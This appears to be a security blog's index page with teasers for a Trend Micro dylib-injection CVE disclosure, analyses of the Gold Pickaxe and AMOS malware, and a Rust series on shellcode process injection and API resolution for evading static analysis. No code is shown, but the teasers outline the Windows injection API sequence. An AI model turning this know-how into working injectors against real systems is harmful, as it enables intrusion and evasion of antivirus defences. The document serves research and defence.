Blog
May 6, 2024 • 6 min read • macOS
CVE-2024-34456: Trend Micro Antivirus One Dylib Injection
During a red teaming activity, we gained access to a company MacBook; the Trend Micro Antivirus One software was running and prevented us from running our tools without being detected.So, I analyzed the software and found a misconfiguration that allow to inject a custom dylib into the application process.The CVE202434456 has been assigned to this issue, affecting Trend Micro Antivirus One version 3.10.3 and below. I reported it on February 6, 2024, and according to Trend Micro, following its resolution, the public disclosure was scheduled for today, May 6, 2024....
April 19, 2024 • 12 min read • malwares
Gold Pickaxe iOS Technical Analysis: IPA Overview and C2 Communication Startup
In February 2024 GroupIB wrote a blog post about a mobile Trojan developed by a Chinesespeaking cybercrimine group called Gold Pickaxe.This malware targets both iOS and Android users in the Asia Pacific region in order to collect identity documents, SMS, pictures and other data related to the compromised phones.The malware communicates with the C2 using two protocolsThe websocket protocol used to listen for incoming commands The HTTP protocol used to send information and data to the C2 In this article we are going to analyse the IPA file, and then describe how the malware connects to the C2 websocket server....
March 1, 2024 • 11 min read • malwares
AMOS (Atomic macOS Stealer) Analysis
Hello everybody, this is my first macOS malware analysis, I took a sample from malwarebazaar and tried to reverse it, the sample was uploaded by Cryptolaemus1 on 14 Feb 2024.While analysing the stage two, it was clear that the sample is a variant of Atomic Stealer.Atomic Stealer, as reported by SentinelOne is a macOS info stealer sold on Telegram, able to grab system information, account credential, browser data, session cookies and crypto wallets....
November 20, 2023 • 11 min read • rust
Rustware Part 3: Dynamic API resolution (Windows)
In the previous blog post we have seen how to perform a shellcode process injection by finding a target process PID using several WinAPIs, in that case all the WinAPIs were called directly. Usually malwares resolve the WinAPI address at runtime in order to hide malicious behaviours during static analysis.I have to thank Jacopo for his feedbacks, he helped me to improve the code.In this blog post we will see how to use two wellknown WinAPIs to dynamically resolve the WinAPIs Address GetModuleHandle used to get a module address and GetProcessAddress used to get a WinAPI address....
November 6, 2023 • 9 min read • rust
Rustware Part 2: Process Enumeration Development (Windows)
In the previous blog post we have seen how to develop a Shellcode Process Injection in Rust; the described Process Injection flow relies on several WinAPIs OpenProcess used to open a handle to the target process, then VirtualAllocEx was used to allocate a new readable and writable region of memory into the target process, WriteProcessMemory wrote the shellcode into the new allocated memory, then VirtualProtectEx was used to change the new allocated memory protection to readable and executable in order to allow the CreateRemoteThread to execute the shellcode contained into the new allocated memory in the target process....
October 27, 2023 • 11 min read • rust
Rustware Part 1: Shellcode Process Injection Development (Windows)
Malware development is essential when performing activities like Red Teaming, Adversary Emulation and Network Penetration Testing, the operator can use custom malwares to perform various tasks based on the specific situation. At the same time, analyzing Malwares is useful to learn how malwares work and how to detect them, in order to defend our companies from threat actors. For these reasons I studied several books and courses about Windows Internals, Malware Development and Malware Analysis....